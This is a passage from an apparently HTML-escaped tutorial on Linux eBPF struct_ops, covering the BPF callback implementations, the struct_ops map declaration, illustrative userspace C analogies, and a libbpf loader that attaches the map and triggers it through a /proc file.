        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;len&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="cm"&gt;/* Define the struct_ops map */&lt;/span&gt;
&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".struct_ops"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops&lt;/span&gt; &lt;span class="n"&gt;testmod_ops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;test_1&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;bpf_testmod_test_1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;test_2&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;bpf_testmod_test_2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;test_3&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;bpf_testmod_test_3&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Understanding the BPF Code
&lt;/h3&gt;

&lt;p&gt;The BPF code is short, because the &lt;code&gt;struct_ops&lt;/code&gt; abstraction leaves the BPF side with little to do beyond implementing the callbacks and declaring one map.&lt;/p&gt;

&lt;p&gt;Each function in the BPF program corresponds to one of the operations defined in the kernel module's &lt;code&gt;bpf_testmod_ops&lt;/code&gt; struct. The magic lies in the &lt;code&gt;SEC&lt;/code&gt; annotations:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;SEC("struct_ops/test_1")&lt;/code&gt;: This tells the BPF loader that the &lt;code&gt;bpf_testmod_test_1&lt;/code&gt; program is an implementation for a &lt;code&gt;struct_ops&lt;/code&gt; operation. The name after the slash isn't strictly enforced to match the function name, but it's a good convention. The key part is the &lt;code&gt;struct_ops&lt;/code&gt; prefix.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The implementations themselves are simple:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;bpf_testmod_test_1&lt;/code&gt;: This function takes no arguments, prints a message to the kernel trace log using &lt;code&gt;bpf_printk&lt;/code&gt;, and returns the integer &lt;code&gt;42&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;bpf_testmod_test_2&lt;/code&gt;: This function takes two integers, &lt;code&gt;a&lt;/code&gt; and &lt;code&gt;b&lt;/code&gt;, calculates their sum, prints the operation and result, and returns the sum.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;bpf_testmod_test_3&lt;/code&gt;: This function demonstrates handling a buffer that originates in userspace and reaches the BPF program through the kernel module. It receives a character buffer and its length, then uses &lt;code&gt;bpf_probe_read_kernel&lt;/code&gt; to copy the data into a local buffer on the BPF stack. This copy is a crucial safety measure: the verifier does not let BPF programs dereference arbitrary kernel pointers directly, and the helper returns an error instead of faulting if the address is bad. After reading, it prints the content.&lt;/li&gt;
&lt;/ul&gt;
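
&lt;p&gt;The bounded copy in &lt;code&gt;bpf_testmod_test_3&lt;/code&gt; follows a pattern that can be sketched in plain userspace C. This is only an analogy, not BPF code: the helper name &lt;code&gt;bounded_copy&lt;/code&gt; is an assumption made for illustration, and &lt;code&gt;memcpy&lt;/code&gt; stands in for &lt;code&gt;bpf_probe_read_kernel&lt;/code&gt;. The point it tries to show is that the copy length is clamped to the destination size before any byte is read.&lt;/p&gt;

```c
#include <stddef.h>
#include <string.h>

/*
 * Hypothetical helper (not part of the tutorial's source): copy at most
 * dst_size - 1 bytes from src into dst and always NUL-terminate.
 * Returns the number of bytes copied.
 */
static size_t bounded_copy(char *dst, size_t dst_size,
                           const char *src, size_t src_len)
{
    size_t n;

    if (dst_size == 0)
        return 0;

    /* Clamp the length so the copy can never overrun dst. */
    n = src_len < dst_size - 1 ? src_len : dst_size - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return n;
}
```

&lt;p&gt;Called with a small destination buffer and a longer message, the helper copies only what fits and leaves room for the terminator, which is the same discipline the verifier expects from a BPF program reading into its stack.&lt;/p&gt;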

&lt;p&gt;The final piece is the &lt;code&gt;struct_ops&lt;/code&gt; map itself:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".struct_ops"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops&lt;/span&gt; &lt;span class="n"&gt;testmod_ops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;test_1&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;bpf_testmod_test_1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;test_2&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;bpf_testmod_test_2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;test_3&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;bpf_testmod_test_3&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is the most critical part for linking everything together.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;SEC(".struct_ops")&lt;/code&gt;: This special section identifies the following data structure as a &lt;code&gt;struct_ops&lt;/code&gt; map.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;struct bpf_testmod_ops testmod_ops&lt;/code&gt;: We declare a variable named &lt;code&gt;testmod_ops&lt;/code&gt; of the type &lt;code&gt;struct bpf_testmod_ops&lt;/code&gt;. The &lt;strong&gt;type of this variable is important&lt;/strong&gt;. The struct type name must match the &lt;code&gt;name&lt;/code&gt; field in the &lt;code&gt;bpf_struct_ops&lt;/code&gt; definition within the kernel module (&lt;code&gt;.name = "bpf_testmod_ops"&lt;/code&gt;), because &lt;code&gt;libbpf&lt;/code&gt; looks up the kernel &lt;code&gt;struct_ops&lt;/code&gt; by that type name in BTF. The variable name, &lt;code&gt;testmod_ops&lt;/code&gt;, is yours to choose; it becomes the map name that the skeleton exposes as &lt;code&gt;skel-&amp;gt;maps.testmod_ops&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;The structure is initialized by assigning the BPF programs (&lt;code&gt;bpf_testmod_test_1&lt;/code&gt;, etc.) to the corresponding function pointers. This maps our BPF functions to the "slots" in the &lt;code&gt;struct_ops&lt;/code&gt; interface.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;When the userspace loader attaches this &lt;code&gt;struct_ops&lt;/code&gt;, &lt;code&gt;libbpf&lt;/code&gt; and the kernel work together to find the &lt;code&gt;bpf_testmod_ops&lt;/code&gt; registered by our kernel module and link these BPF programs as its implementation.&lt;/p&gt;
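
&lt;p&gt;Conceptually, a &lt;code&gt;struct_ops&lt;/code&gt; is a table of function pointers that one component defines and another fills in. The following is a minimal userspace sketch of that idea, with no kernel or &lt;code&gt;libbpf&lt;/code&gt; involved. All names in it (&lt;code&gt;demo_ops&lt;/code&gt;, &lt;code&gt;demo_register&lt;/code&gt;, &lt;code&gt;demo_unregister&lt;/code&gt;, &lt;code&gt;demo_trigger&lt;/code&gt;, &lt;code&gt;impl&lt;/code&gt;) are hypothetical and only mirror the shape of &lt;code&gt;bpf_testmod_ops&lt;/code&gt;; the real registration path goes through BTF and the verifier.&lt;/p&gt;

```c
#include <stddef.h>

/* Hypothetical interface, shaped like the module's ops table. */
struct demo_ops {
    int (*test_1)(void);
    int (*test_2)(int a, int b);
};

/* The currently registered implementation, or NULL if none. */
static const struct demo_ops *active_ops;

/* Stand-in for attaching: remember which implementation to call. */
static int demo_register(const struct demo_ops *ops)
{
    if (!ops || !ops->test_1 || !ops->test_2)
        return -1;          /* refuse incomplete tables */
    if (active_ops)
        return -1;          /* only one implementation at a time */
    active_ops = ops;
    return 0;
}

/* Stand-in for detaching. */
static void demo_unregister(void)
{
    active_ops = NULL;
}

/* Stand-in for the trigger path: dispatch through the table. */
static int demo_trigger(int a, int b, int *r1, int *r2)
{
    if (!active_ops)
        return -1;
    *r1 = active_ops->test_1();
    *r2 = active_ops->test_2(a, b);
    return 0;
}

/* One possible implementation, playing the role of the BPF programs. */
static int impl_test_1(void) { return 42; }
static int impl_test_2(int a, int b) { return a + b; }

static const struct demo_ops impl = {
    .test_1 = impl_test_1,
    .test_2 = impl_test_2,
};
```

&lt;p&gt;In this analogy, &lt;code&gt;demo_register(&amp;amp;impl)&lt;/code&gt; plays the role of the attach step, and &lt;code&gt;demo_trigger()&lt;/code&gt; plays the role of the module calling through its ops pointer. The caller never needs to know which implementation sits behind the table.&lt;/p&gt;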

&lt;h2&gt;
  
  
  The Userspace Loader: Attaching and Triggering
&lt;/h2&gt;

&lt;p&gt;The final component is the userspace program. Its job is to load the BPF program, attach it to the &lt;code&gt;struct_ops&lt;/code&gt; defined by the kernel module, and then trigger the operations to demonstrate that everything is working.&lt;/p&gt;

&lt;h3&gt;
  
  
  Complete Userspace Program: &lt;code&gt;struct_ops.c&lt;/code&gt;
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;stdio.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;stdlib.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;signal.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;unistd.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;fcntl.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;string.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/libbpf.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;"struct_ops.skel.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;exiting&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;handle_signal&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;sig&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;exiting&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;true&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;trigger_struct_ops&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;message&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;fd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;fd&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"/proc/bpf_testmod_trigger"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;O_WRONLY&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;fd&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;perror&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"open /proc/bpf_testmod_trigger"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;fd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;message&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;strlen&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;message&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;perror&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"write"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;close&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;fd&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;close&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;fd&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;struct_ops_bpf&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_link&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;link&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;signal&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;SIGINT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;handle_signal&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;signal&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;SIGTERM&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;handle_signal&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="cm"&gt;/* Open BPF application */&lt;/span&gt;
    &lt;span class="n"&gt;skel&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;struct_ops_bpf__open&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Failed to open BPF skeleton&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Load BPF programs */&lt;/span&gt;
    &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;struct_ops_bpf__load&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Failed to load BPF skeleton: %d&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;goto&lt;/span&gt; &lt;span class="n"&gt;cleanup&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Register struct_ops */&lt;/span&gt;
    &lt;span class="n"&gt;link&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map__attach_struct_ops&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;maps&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;testmod_ops&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;link&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Failed to attach struct_ops&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="k"&gt;goto&lt;/span&gt; &lt;span class="n"&gt;cleanup&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Successfully loaded and attached BPF struct_ops!&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Triggering struct_ops callbacks...&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="cm"&gt;/* Trigger the struct_ops by writing to proc file */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;trigger_struct_ops&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Hello from userspace!"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Failed to trigger struct_ops - is the kernel module loaded?&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Load it with: sudo insmod module/hello.ko&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Triggered struct_ops successfully! Check dmesg for output.&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;Press Ctrl-C to exit...&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="cm"&gt;/* Main loop - trigger periodically */&lt;/span&gt;
    &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;exiting&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;sleep&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;exiting&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;trigger_struct_ops&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Periodic trigger"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Triggered struct_ops again...&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;Detaching struct_ops...&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;bpf_link__destroy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;link&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="nl"&gt;cleanup:&lt;/span&gt;
    &lt;span class="n"&gt;struct_ops_bpf__destroy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
